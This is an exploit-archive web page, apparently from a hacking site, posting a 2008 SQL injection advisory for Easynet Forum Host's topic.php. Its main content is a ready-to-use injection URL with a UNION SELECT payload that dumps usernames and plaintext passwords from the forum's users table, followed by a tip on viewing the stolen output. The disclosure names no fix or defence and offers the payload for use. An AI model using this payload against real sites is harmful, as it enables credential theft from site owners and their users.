#Home
|
#Search
|
#IRC(
WEB
/
Client
)
|
#MD5 Cracker
|
#Categories
|
#Links
|
#About
Easynet Forum Host (topic.php) SQL Injection Vulnerbility
//------------------------------------------------ // Easynet Forum Host SQL Injection Vulnerbility //------------------------------------------------ // Discovered by: Pr0T3cT10n, pr0t3ct10n@gmail.com // Discovered on: 5 April 2008 // SCRIPT DOWNLOAD: N/A //------------------------------------------------ // SCRIPT SITE: http://www.easynet4u.com/forum //------------------------------------------------ // Description: retrive users username and plaintext password. //------------------------------------------------ // NOTE / TIP: After you exploit the site please press CTRL+A :) // EXPLOIT: http://www.server.com/SCRIPT_PATH/topic.php?topic=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,password),5,6/**/FROM/**/users/*&forum=0 //------------------------------------------------
Back
Send all submissions to nullbyte.israel[at]gmail.com
Copyright © 2009 - 2010 | Queries: 4
